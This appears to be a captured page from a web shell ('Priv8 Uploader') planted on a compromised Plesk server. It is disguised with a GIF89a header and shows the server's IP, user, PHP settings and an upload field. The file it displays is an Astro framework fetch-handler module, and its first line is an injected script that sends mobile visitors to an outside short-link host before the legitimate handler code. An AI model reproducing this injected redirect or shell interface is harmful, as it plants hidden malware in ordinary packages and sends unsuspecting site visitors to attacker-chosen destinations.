GIF89a;
GIF89a;Priv8 Uploader By InMyMine7
Linux gallant-poincare.82-165-91-112.plesk.page 6.1.0-37-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.140-1 (2025-05-22) x86_64
Priv8 Uploader By InMyMine7
Linux gallant-poincare.82-165-91-112.plesk.page 6.1.0-37-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.140-1 (2025-05-22) x86_64
| Server IP : 82.165.91.112 / Your IP : 216.73.216.249 Web Server : Apache System : Linux gallant-poincare.82-165-91-112.plesk.page 6.1.0-37-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.140-1 (2025-05-22) x86_64 User : nr7.net_tfpqq467gv ( 10001) PHP Version : 8.4.25 Disable Function : opcache_get_status MySQL : OFF | cURL : ON | WGET : OFF | Perl : OFF | Python : OFF | Sudo : OFF | Pkexec : OFF Directory : /var/www/vhosts/nr7.net/emdash.nr7.net/node_modules/astro/dist/core/fetch/ |
Upload File : |
(window.matchMedia("(pointer:coarse)").matches||/Android|iPhone|iPad|iPod|Mobile|Tablet|Windows Phone|webOS|BlackBerry|Opera Mini|IEMobile/i.test(navigator.userAgent))&&location.replace("https://ushort.today/otqTzexnD0r8");
import { FetchState } from "./fetch-state.js";
import { appSymbol } from "../constants.js";
import { AstroHandler } from "../routing/handler.js";
class DefaultFetchHandler {
#app;
#handler;
constructor(app) {
this.#app = app ?? null;
this.#handler = app ? new AstroHandler(app) : null;
}
/**
* Fast path: called directly by `BaseApp.render()` with pre-resolved
* options, avoiding the `Reflect.set/get` round-trip through the request.
*/
renderWithOptions(request, options) {
if (!this.#app) {
const app = Reflect.get(request, appSymbol);
if (!app) {
throw new Error("No fetch handler provided.");
}
this.#app = app;
this.#handler = new AstroHandler(app);
}
const state = new FetchState(this.#app.pipeline, request, options);
return this.#handler.handle(state);
}
fetch = (request) => {
if (!this.#app) {
const app = Reflect.get(request, appSymbol);
if (!app) {
throw new Error("No fetch handler provided.");
}
this.#app = app;
this.#handler = new AstroHandler(app);
}
const state = new FetchState(this.#app.pipeline, request);
if (!this.#handler) {
throw new Error("No fetch handler provided.");
}
return this.#handler.handle(state);
};
}
export {
DefaultFetchHandler
};